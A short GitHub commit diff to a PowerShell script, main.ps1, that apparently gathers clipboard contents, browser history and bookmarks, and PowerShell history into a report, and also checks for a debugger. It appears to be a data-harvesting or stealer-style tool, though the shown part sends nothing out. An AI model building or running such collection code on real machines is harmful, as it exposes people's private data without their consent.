Update main.ps1

This commit is contained in:
egieb
2024-12-31 23:08:12 +00:00
committed by GitHub
parent 6437f06715
commit aee59486bd

View File

@@ -289,6 +289,9 @@ $debugDetect = "Debugging Check : $debugD"
$clipboard = Get-Clipboard
if (!($clipboard)){
$clipboard = "No Data Found.."
}
# History and Bookmark Data
$Expression = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$Paths = @{
@@ -489,7 +492,7 @@ $clipboard
Browser History
---------------------------------------
$Value
$entry
Powershell History
---------------------------------------